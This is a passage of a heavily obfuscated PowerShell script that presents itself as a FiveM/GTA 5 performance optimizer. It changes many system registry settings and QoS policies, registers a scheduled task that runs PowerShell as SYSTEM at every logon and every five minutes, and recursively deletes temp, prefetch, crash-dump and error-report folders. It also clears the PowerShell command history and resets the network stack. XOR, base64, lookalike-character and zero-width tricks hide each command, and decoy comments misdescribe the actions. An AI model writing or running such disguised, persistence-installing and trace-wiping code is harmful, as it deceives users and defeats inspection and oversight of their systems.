    $eMc7rfm = "$([char]0x48)$([char]0x4B)$([char]0x4C)$([char]0x4D)$([char]0x3A)$([char]0x5C)$([char]0x53)$([char]0x4F)$([char]0x46)$([char]0x54)$([char]0x57)$([char]0x41)$([char]0x52)$([char]0x45)$([char]0x5C)$([char]0x50)$([char]0x6F)$([char]0x6C)$([char]0x69)$([char]0x63)$([char]0x69)$([char]0x65)$([char]0x73)$([char]0x5C)$([char]0x4D)$([char]0x69)$([char]0x63)$([char]0x72)$([char]0x6F)$([char]0x73)$([char]0x6F)$([char]0x66)$([char]0x74)$([char]0x5C)$([char]0x57)$([char]0x69)$([char]0x6E)$([char]0x64)$([char]0x6F)$([char]0x77)$([char]0x73)$([char]0x5C)$([char]0x44)$([char]0x61)$([char]0x74)$([char]0x61)$([char]0x43)$([char]0x6F)$([char]0x6C)$([char]0x6C)$([char]0x65)$([char]0x63)$([char]0x74)$([char]0x69)$([char]0x6F)$([char]0x6E)"
    if (-not (&(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dGVzVC0=')))+'рАТh') $emc7Rfm)) { NEW-Ite`M -PAtH $emc7RfM -foRce | &(('OU'+'t-n')+(-join([char]0x55, [char]0x4C, [char]0x4C))) }
    &($($k9134=114;$b=[byte[]](0x3c);-join($b|%{[char]($_-bxor$k9134)}))+'e‌w‌-​I​t‍E‌m​P​r‌o​p​e‍r‌T‍Y​') -pATh $Emc7Rfm -NAmE 'A‌l‌l‍o‍w​T‌e‌l‌e​m​e​t​r‌y​' -vALue (-56 -bxor -56) -PropERTyTYPE DWoRd -FORCE | &(('{0}' -f 'oUT-n')+('uL'+'l'))

# Standard cleanup in progress — no user action needed
    &("$([char]0x77)$([char]0x72)$([char]0x69)$([char]0x54)$([char]0x45)$([char]0x2D)$([char]0x68)$([char]0x6F)$([char]0x73)"+([string]::Format('{0}','t'))) $($k3903=7;$b=[byte[]](0x5c,0x39,0x5a,0x27,0x42,0x6b,0x62,0x71,0x66,0x73,0x6e,0x69,0x60,0x27,0x40,0x66,0x6a,0x62,0x27,0x53,0x6f,0x75,0x62,0x66,0x63,0x27,0x54,0x64,0x6f,0x62,0x63,0x72,0x6b,0x6e,0x69,0x60,0x27,0x77,0x66,0x75,0x66,0x6a,0x62,0x73,0x62,0x75,0x74,0x29,0x29,0x29);-join($b|%{[char]($_-bxor$k3903)})) -fOregrouNDcOlor WHitE
    $MyowmNRR = ([string]::Format('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}{17}{18}{19}{20}{21}{22}{23}','HKL','M:','\SOF','T','W','ARE','\','Micro','soft','\Win','dow','s',' NT\C','urre','n','tVers','ion\','Multi','med','i','a\Sy','stem','Pro','file'))
    &($(-join('gxp-bmX'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+7)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+7)%26))}else{[char]$c}}))+'mРRоРеrtу') -PAth $mYOwMnrR -naMe (-join([char]0x4E, [char]0x65, [char]0x74, [char]0x77, [char]0x6F, [char]0x72, [char]0x6B, [char]0x54, [char]0x68, [char]0x72, [char]0x6F, [char]0x74, [char]0x74, [char]0x6C, [char]0x69, [char]0x6E, [char]0x67, [char]0x49, [char]0x6E, [char]0x64, [char]0x65, [char]0x78)) -VaLuE 0XFfFfFffF -PrOpErTytypE DWOrd -fOrCe | Out-nuL`l
    NeW-iTEMProPErty -patH $myOwmNrR -nAMe 'S‌y‍s‍t‌e‍m​R‍e‍s‌p‍o​n‍s​i‍v‌e‌n‍e‌s‌s‌' -VALue (-9 + 9) -pRoPERTYtYPe dword -FOrcE | &((-join('o','Ut','-'))+'NULl')

    $LsTMLL = $(-join('SVWX:\DZQEHLCP\Xtnczdzqe\Htyozhd YE\NfccpyeGpcdtzy\Xfwetxpotl\DjdepxAczqtwp\Eldvd\Rlxpd'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+15)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+15)%26))}else{[char]$c}}))
    if (tEST-PAT`h $LSTmlL) {
        &((-join([char]0x6E, [char]0x45, [char]0x77, [char]0x2D))+([string]::Format('{0}{1}{2}{3}{4}{5}','i','tEmp','ROPe','R','T','Y'))) -patH $lSTMLL -nAme ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('R1BVIFByaW9yaXR5'))) -valUE (39 - 31) -PROpErtytYPE DwORd -fORce | &($($k6892=195;$b=[byte[]](0xac,0xb6,0xb7,0xee);-join($b|%{[char]($_-bxor$k6892)}))+('NU'+'ll'))
        NEw-itEmPropeRTy -pAtH $LStmll -naMe "$([char]0x50)$([char]0x72)$([char]0x69)$([char]0x6F)$([char]0x72)$([char]0x69)$([char]0x74)$([char]0x79)" -valUe (2 * 3) -prOPertYtypE dWOrD -FORce | &(('oU'+'t'+'-')+'nuLl')
        neW-itEmpropErTy -PATh $LStMlL -name $($k3101='KfAyqbT0iS&5h';$b=[byte[]](0x18,0x05,0x29,0x1C,0x15,0x17,0x38,0x59,0x07,0x34,0x06,0x76,0x09,0x3F,0x03,0x26,0x16,0x03,0x1B);$kb=[System.Text.Encoding]::UTF8.GetBytes($k3101);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) -VAlue "$([char]0x48)$([char]0x69)$([char]0x67)$([char]0x68)" -pROPeRtyTyPe sTrInG -fOrCe | &('оUТ-n'+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dWxs'))))
        new-iTeMPRopErTY -Path $LSTMLL -NAmE 'SFIО Рrіоrіtу' -VaLUe (-join('H','i','gh')) -PROpErtyTYpE StRing -forCe | &('O'+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dXQtTlVsTA=='))))
    }
    &((-join([char]0x4E, [char]0x45, [char]0x57, [char]0x2D, [char]0x69, [char]0x74, [char]0x65))+$(-join('fiKhiXKMR'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+7)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+7)%26))}else{[char]$c}}))) -PaTh $($k7508='CoJzR3I!OYg';$b=[byte[]](0x0B,0x24,0x09,0x2F,0x68,0x6F,0x1A,0x58,0x3C,0x2D,0x02,0x2E,0x33,0x0D,0x1B,0x3F,0x56,0x0A,0x4E,0x21,0x3F,0x0E,0x24,0x3C,0x3E,0x15,0x20,0x56);$kb=[System.Text.Encoding]::UTF8.GetBytes($k7508);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) -nAME ([System.Text.Encoding]::UTF8.GetString([byte[]](0x47,0x61,0x6D,0x65,0x44,0x56,0x52,0x5F,0x45,0x6E,0x61,0x62,0x6C,0x65,0x64))) -vALue (89 - 89) -PrOperTytYPe dWORD -fOrCE | &(([System.Text.Encoding]::UTF8.GetString([byte[]](0x4F)))+$(-join('SR-lsJj'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+2)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+2)%26))}else{[char]$c}})))
    POwERcFG /h &($($k9392=9;$b=[byte[]](0x66);-join($b|%{[char]($_-bxor$k9392)}))+([string]::Format('{0}{1}','F','f'))) | &('o'+$(-join('Hg-AHYy'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+13)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+13)%26))}else{[char]$c}})))

    &('w‌r‌I‌T‍E​-​'+('{0}{1}' -f 'hos','t')) ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Wz5dIExvY2tpbmcgRml2ZU0gUHJvY2VzcyBTY2hlZHVsaW5nIE1hdHJpeCBpbnRvIEhpZ2ggUHJpb3JpdHkuLi4='))) -fOregroUnDcoLOR GrEEN
    $zqUyW = @(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Rml2ZU0uZXhl'))), ([System.Text.Encoding]::UTF8.GetString([byte[]](0x46,0x69,0x76,0x65,0x4D,0x5F,0x47,0x54,0x41,0x50,0x72,0x6F,0x63,0x65,0x73,0x73,0x2E,0x65,0x78,0x65))), $($k2102=224;$b=[byte[]](0xa6,0x89,0x96,0x85,0xad,0xbf,0x82,0xd2,0xd6,0xd9,0xd9,0xbf,0xa7,0xb4,0xa1,0xb0,0x92,0x8f,0x83,0x85,0x93,0x93,0xce,0x85,0x98,0x85);-join($b|%{[char]($_-bxor$k2102)})), $(-join('CfsbJ_y3095_DQXMolzbpp.bub'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+3)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+3)%26))}else{[char]$c}})), 'F‌i​v‍e​M​_‌b‍3‍2‍5‌8‍_​G​T‌A‍P​r​o‍c​e​s‌s​.‍e‌x‍e​', (-join('GTA5','.exe')))
    for ($I_66620 = 0; $i_66620 -lt $ZQuyw.cOUNt; $I_66620++) {
    $REPIApxq = $zquYw[$I_66620];
    $pfehc = ((-join('H','KLM',':\SOFTW','AR','E\Micro','soft\','Windows ','NT\C','urrentVe','r','sion\','Image ','F','ile Exe','cution ','O','pt','ion','s\')) + $RePiaPxQ)
        if (-not (&($($k5328='i=Mns6]dM&}bGP';$b=[byte[]](0x3D,0x78);$kb=[System.Text.Encoding]::UTF8.GetBytes($k5328);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('U3QtUGFUaA==')))) $PFehc)) { &(('{0}{1}{2}' -f 'NEW-','I','t')+$(-join('ai'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+4)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+4)%26))}else{[char]$c}}))) -pATH $PfEhc -force | &($($k2586=252;$b=[byte[]](0xb3,0xa9,0xa8,0xd1,0x92);-join($b|%{[char]($_-bxor$k2586)}))+$(-join('VMm'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+25)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+25)%26))}else{[char]$c}}))) }
        if (-not (&(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('VGVzVC1QQXQ=')))+'H​') ($pFEhc + ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('XFBlcmZPcHRpb25z')))))) { &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bkU=')))+$(-join('m-yjUc'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+10)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+10)%26))}else{[char]$c}}))) -Path ($pFEhc + ('{0}{1}{2}{3}' -f '\','Per','fOp','tions')) -force | &(('{0}{1}' -f 'O','U')+(-join([char]0x74, [char]0x2D, [char]0x6E, [char]0x55, [char]0x4C, [char]0x6C))) }
        &($($k6155=228;$b=[byte[]](0x8a,0xa1);-join($b|%{[char]($_-bxor$k6155)}))+('{0}{1}{2}{3}{4}' -f 'W','-IT','e','mpro','PERtY')) -patH ($pFEhc + $($k4486=130;$b=[byte[]](0xde,0xd2,0xe7,0xf0,0xe4,0xcd,0xf2,0xf6,0xeb,0xed,0xec,0xf1);-join($b|%{[char]($_-bxor$k4486)}))) -NAme ('{0}{1}{2}{3}{4}{5}' -f 'C','puPri','orit','yCl','as','s') -VAluE (50 -bxor 49) -pROpERtyTYpe dWOrD -fOrCe | &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('T1V0LQ==')))+"$([char]0x6E)$([char]0x75)$([char]0x6C)$([char]0x4C)")
}

    $Uwylq = ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SEtMTTpcU1lTVEVNXEN1cnJlbnRDb250cm9sU2V0XENvbnRyb2xcU2Vzc2lvbiBNYW5hZ2VyXE1lbW9yeSBNYW5hZ2VtZW50')))
    &(('n'+'eW-iTE'+'MP'+'r'+'OPeR')+$(-join('yd'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+21)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+21)%26))}else{[char]$c}}))) -PAtH $uwyLQ -NAME $(-join('ZofusGmghsaQoqvs'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+12)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+12)%26))}else{[char]$c}})) -VaLUE (15 / 15) -PRoPerTYtyPE DwORd -force | &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b1V0')))+([string]::Format('{0}{1}','-','NuLL')))
    new-iTEMproPerTY -pAth $uWYLQ -nAMe $($k3406='^1<}nK-mY{]lN9';$b=[byte[]](0x0D,0x48,0x4F,0x09,0x0B,0x26,0x7D,0x0C,0x3E,0x1E,0x2E);$kb=[System.Text.Encoding]::UTF8.GetBytes($k3406);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) -vaLue 0xfFFFfFFf -pROPerTytyPE DWOrD -FoRCe | &("$([char]0x6F)$([char]0x75)$([char]0x74)"+([string]::Format('{0}{1}{2}{3}','-n','u','L','L')))

# Waiting briefly before continuing with the next block
    &('WrіТе-hОS'+('{0}' -f 't')) ("$([char]0x5B)$([char]0x3E)$([char]0x5D)$([char]0x20)$([char]0x49)$([char]0x6E)$([char]0x6A)$([char]0x65)$([char]0x63)$([char]0x74)$([char]0x69)$([char]0x6E)$([char]0x67)$([char]0x20)" + $(-72 + 77) + "$([char]0x2D)$([char]0x4D)$([char]0x69)$([char]0x6E)$([char]0x20)$([char]0x53)$([char]0x63)$([char]0x68)$([char]0x65)$([char]0x64)$([char]0x75)$([char]0x6C)$([char]0x65)$([char]0x64)$([char]0x20)$([char]0x41)$([char]0x75)$([char]0x74)$([char]0x6F)$([char]0x2D)$([char]0x52)$([char]0x41)$([char]0x4D)$([char]0x20)$([char]0x45)$([char]0x6E)$([char]0x67)$([char]0x69)$([char]0x6E)$([char]0x65)$([char]0x20)$([char]0x28)$([char]0x46)$([char]0x69)$([char]0x78)$([char]0x20)$([char]0x4C)$([char]0x65)$([char]0x61)$([char]0x6B)$([char]0x29)$([char]0x2E)$([char]0x2E)$([char]0x2E)") -ForEgRoundcolOR grEen
    $NOt7 = &(('{0}{1}{2}{3}{4}{5}{6}' -f 'nE','w-scH','e','d','u','L','e')+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZHRBc2tBY1Rpb04=')))) -ExEcuTE ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbC5leGU='))) -arguMent '-​N​o‍P​r‍o​f‍i‌l​e​ ‍-‌C​o‍m​m​a‍n‍d‌ ​`‍`‌`‍'[System.GC]::Collect(); [System.GC]::WaitForPendingFinalizers();```"(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('DQogICAg'))) + $AMGWhPbs + ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ID0gJig='))))NeW-SChedULEDtaskTRiGG"+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZXI=')))) -AtlogON
    $AMGwHpbS.rePEtItiOn.iNTervAl = (&($($k3885='s{IhJ[Eg';$b=[byte[]](0x3D,0x3E,0x1E,0x45,0x1E,0x12,0x08,0x22,0x00);$kb=[System.Text.Encoding]::UTF8.GetBytes($k3885);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+(-join('P','A','N'))) -miNutES 5)
    $TvLGp0 = &(([string]::Format('{0}{1}{2}{3}{4}{5}','n','E','W-','s','cH','ED'))+(-join([char]0x75, [char]0x6C, [char]0x65, [char]0x64, [char]0x74, [char]0x61, [char]0x73, [char]0x6B, [char]0x73, [char]0x65, [char]0x74, [char]0x54, [char]0x49, [char]0x6E, [char]0x67, [char]0x73, [char]0x53, [char]0x65, [char]0x54))) -ALLOWstArTifoNBATTERiES -doNTSTOPifgoInGonBAtteRies -sTaRTwHeNAVaIlabLe
    reGiStEr-sChEDuleDtAsk -tAskNaMe ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('TGl0ZVByb19NZW1vcnlfQXV0b0ZsdXNo'))) -ActIoN $Not7 -trIggER $aMgWhpbS -SeTTInGs $tvLGP0 -usEr $($k5752=106;$b=[byte[]](0x39,0x33,0x39,0x3e,0x2f,0x27);-join($b|%{[char]($_-bxor$k5752)})) -forcE | &('ОuТ-nu'+('{0}{1}' -f 'L','l'))

# Watching for inconsistencies in runtime behavior
    &($($k3654='Y+Uxdc';$b=[byte[]](0x0E,0x59);$kb=[System.Text.Encoding]::UTF8.GetBytes($k3654);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+'i‍t‌e‌-‌H​O​S​t‍') $(-join('[>] Sxujlqj Ghhs Vwrudjh Mxqn & SrzhuVkhoo Klvwrub...'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+23)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+23)%26))}else{[char]$c}})) -FoRegroUndcoloR YELLoW

# Temporary bypass (pending review from ops)
    $v42ZM = @(
        ($HZVBoId6 + ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OlVTRVJQUk9GSUxFXEFwcERhdGFcTG9jYWxcVGVtcFwq')))),
        ($HZVBoId6 + $(-join(':WcwxiqVssx\Xiqt\*'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+22)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+22)%26))}else{[char]$c}}))),
        ($HZVBoId6 + (':S'+'y'+'stemRo'+'ot\'+'Pre'+'fetc'+'h\*')),
        ($HZVBoId6 + $(-join(':IoijucHeej\IevjmqhuTyijhyrkjyed\Temdbeqt\*'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+10)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+10)%26))}else{[char]$c}}))),
        ($HZVBoId6 + ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OkxPQ0FMQVBQREFUQVxDcmFzaER1bXBzXCo=')))),
        ($HZVBoId6 + ':‍P​r‌o‌g‌r‌a​m‍D​a‍t‌a​\‍M‍i​c​r​o​s‍o‍f‌t‍\‍W‌i‌n‌d​o‍w​s‌\‍W‍E‌R‌\‌*‍')
    )
    for ($i_12075 = 0; $I_12075 -lt $v42ZM.coUNT; $i_12075++) {
    $PtnXKJ = $v42zM[$i_12075];
    &(('{0}{1}' -f 'remoV','E-I')+"$([char]0x74)$([char]0x65)$([char]0x6D)") -paTh $PTnxKj -rECURSe -FoRce -ERroRACtioN SIlenTlycOntInue | &('o‌U‌t‍-‌N​'+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dUxs'))))
}

# Normalizing schema mismatch across modules
    &($(-join('LunJa-qr'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+17)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+17)%26))}else{[char]$c}}))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('U1RPUnk=')))) -errORactiOn sIlentLYCONtINue
    $xm5A = ($HZVBoId6 + (':APPD'+'ATA\Mi'+'cro'+'soft\Win'+'dows\Po'+'werShe'+'ll\'+'PSRea'+'dLine'+'\Console'+'Host_his'+'tory.t'+'x'+'t'))
    if (Te`sT-Path $XM5A) {
        &(('C'+'L')+$($k1289='g%(zN';$b=[byte[]](0x02,0x64,0x5A,0x57,0x2D,0x28,0x4B,0x5C,0x3F,0x20,0x13);$kb=[System.Text.Encoding]::UTF8.GetBytes($k1289);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) -paTH $xm5A -ErrOraCtiON silENtLycoNTinUE
    }

# Only used in fallback scenarios
    &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SVBDT04=')))+('{0}' -f 'fIG')) /flUShDNS | &($(-join('Zfe-YF'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+15)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+15)%26))}else{[char]$c}}))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('TGw='))))
    NetSH &('I‌n‍'+(-join([char]0x74))) ip &(('{0}' -f 'r')+$(-join('RfRG'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+13)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+13)%26))}else{[char]$c}}))) | &($(-join('mSr-lSJ'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+2)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+2)%26))}else{[char]$c}}))+"$([char]0x4C)")
    netSH &(([string]::Format('{0}{1}','wIN','SoC'))+'K') &((-join([char]0x52, [char]0x65, [char]0x53))+(-join('E','T'))) | &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('T3U=')))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dC1uVUxM'))))

    wRITE-HoST $($k8058='8NDzOGLi';$b=[byte[]](0x58,0x2E,0x2A,0x21,0x62,0x1A,0x6C,0x28,0x74,0x02,0x64,0x2A,0x0A,0x15,0x0A,0x26,0x6A,0x03,0x05,0x34,0x0C,0x02,0x6C,0x4F,0x18,0x0A,0x01,0x3F,0x1F,0x67,0x0F,0x25,0x7D,0x0F,0x0A,0x5A,0x02,0x08,0x08,0x3C,0x74,0x0B,0x17,0x5A,0x0E,0x17,0x1C,0x25,0x71,0x0B,0x00,0x5B);$kb=[System.Text.Encoding]::UTF8.GetBytes($k8058);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) -fOREgrouNdCoLor greEN
    &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpVEUtaG9T')))+'T') ('[!] A'+' System'+' REBOO'+'T is r'+'ecomme'+'nd'+'e'+'d to'+' loc'+'k in'+' '+'a'+'ll en'+'gine ch'+'anges'+'.') -foreGROuNdcOLor YEllow
    &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('UkVBZC1oTw==')))+([System.Text.Encoding]::UTF8.GetString([byte[]](0x73,0x54)))) '``nРrеss Еntеr tо rеturn tо Меnu...'
}

function GaME-QosPOLICy {
    &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('d3JJVGUtaG9z')))+'t') $(-join('``e==========================================================='.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+9)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+9)%26))}else{[char]$c}})) -fOReGRouNDcOLOR BLUe
    &(('wrIT'+'e'+'-h'+'O')+$(-join('hI'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+11)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+11)%26))}else{[char]$c}}))) $(-join('          NQDM U MVOQVM DQX VMBEWZS QVRMKBQWV              '.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+18)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+18)%26))}else{[char]$c}})) -foRegrOUndCoLOR bLUe
    &($(-join('mhyju'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+10)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+10)%26))}else{[char]$c}}))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('LWhPc1Q=')))) ('========'+'====='+'======='+'=='+'==='+'==='+'===='+'='+'========'+'======='+'======'+'==='+'='+'=') -FOREGroundCoLor BLUe
    &((-join([char]0x77, [char]0x52))+([string]::Format('{0}{1}{2}{3}{4}','IT','e-h','o','S','t'))) (([System.Text.Encoding]::UTF8.GetString([byte[]](0x5B,0x3E,0x5D,0x20,0x52,0x6F,0x75,0x74,0x69,0x6E,0x67,0x20,0x44,0x53,0x43,0x50,0x20))) + $(-1472 / -32) + ([System.Text.Encoding]::UTF8.GetString([byte[]](0x20,0x4C,0x61,0x6E,0x65,0x73,0x20,0x6F,0x6E,0x74,0x6F,0x20,0x61,0x6C,0x6C,0x20,0x46,0x69,0x76,0x65,0x4D,0x20,0x73,0x75,0x62,0x73,0x79,0x73,0x74,0x65,0x6D,0x73,0x2E,0x2E,0x2E)))) -foregRouNdColOr gReEn

    $I6QQIRAg = @($($k4962='v<*R_%h#:py7k:';$b=[byte[]](0x30,0x55,0x5C,0x37,0x12,0x0B,0x0D,0x5B,0x5F);$kb=[System.Text.Encoding]::UTF8.GetBytes($k4962);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})), ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Rml2ZU1fR1RBUHJvY2Vzcy5leGU='))), ('Five'+'M_b'+'269'+'9_GTA'+'Proces'+'s.ex'+'e'), $($k7998=70;$b=[byte[]](0x00,0x2f,0x30,0x23,0x0b,0x19,0x24,0x74,0x7e,0x76,0x74,0x19,0x01,0x12,0x07,0x16,0x34,0x29,0x25,0x23,0x35,0x35,0x68,0x23,0x3e,0x23);-join($b|%{[char]($_-bxor$k7998)})), ('{0}{1}{2}{3}{4}{5}{6}' -f 'FiveM','_b309','5_GTA','Proc','e','ss.ex','e'), $(-join('YboxF_u3258_ZMTIkhvxll.xqx'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+7)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+7)%26))}else{[char]$c}})), $(-join('RuhqY_n3184_SFMBdaoqee.qjq'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+14)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+14)%26))}else{[char]$c}})), ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('R1RBNS5leGU='))))

    if (-not (&('tеst-Р'+'A‌t‌h​') ('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}' -f 'HKL','M:','\SO','FTW','ARE\P','ol','ic','i','es\M','icro','soft\','Wi','nd','ows','\','QoS'))) {
        &('N'+(-join([char]0x45, [char]0x77, [char]0x2D, [char]0x49, [char]0x74, [char]0x65, [char]0x6D))) -PaTH $($k9234='XU]HN>^)dJ';$b=[byte[]](0x10,0x1E,0x11,0x05,0x74,0x62,0x0D,0x66,0x22,0x1E,0x0F,0x14,0x0F,0x0D,0x12,0x6E,0x31,0x45,0x0D,0x29,0x31,0x30,0x2E,0x14,0x03,0x57,0x3D,0x5B,0x0B,0x39,0x37,0x33,0x29,0x14,0x19,0x57,0x30,0x4D,0x0B,0x3D,0x2B,0x09,0x0C,0x27,0x1D);$kb=[System.Text.Encoding]::UTF8.GetBytes($k9234);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) -FORCE | &(([string]::Format('{0}{1}{2}{3}','ou','t-','nU','L'))+$($k4641=15;$b=[byte[]](0x63);-join($b|%{[char]($_-bxor$k4641)})))
    }

    for ($I_54960 = 0; $i_54960 -lt $i6qqirag.CoUNt; $i_54960++) {
    $RepiApXq = $I6QqiRAG[$I_54960];
    $SjVW = ($(-join('ADEF:\LHYMPTKX\Ihebvbxl\Fbvkhlhym\Pbgwhpl\JhL\Ikbhkbmr_Itll_'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+7)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+7)%26))}else{[char]$c}})) + $RePiaPxQ)
        if (-not (&(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('VEVTdC1w')))+'A‍t​H‌') $SjVw)) { &($(-join('G'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+7)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+7)%26))}else{[char]$c}}))+('eW-i'+'teM')) -PaTH $SjVW -foRCE | &('o‍u‌t‌-‍N‌'+$($k2743='<wf:z#G';$b=[byte[]](0x69,0x3B,0x0A);$kb=[System.Text.Encoding]::UTF8.GetBytes($k2743);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) }

        &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('TmV3LUlU')))+$(-join('tBEGDetgin'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+11)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+11)%26))}else{[char]$c}}))) -paTh $sjvw -NAmE ('Ver'+'sion') -Value (('{0}{1}' -f '1','.') + $(100 % 20)) -prOpERtytYpe striNg -forCE | &((-join('ou','T','-Nu','L'))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('TA=='))))
        New-iTEMPROpeRTY -patH $sJVW -NaMe (-join('Ap','plica','ti','on ','Name')) -vALUE $REpIApXQ -PROPErtyTyPe sTRinG -forCE | oUt-NU`lL
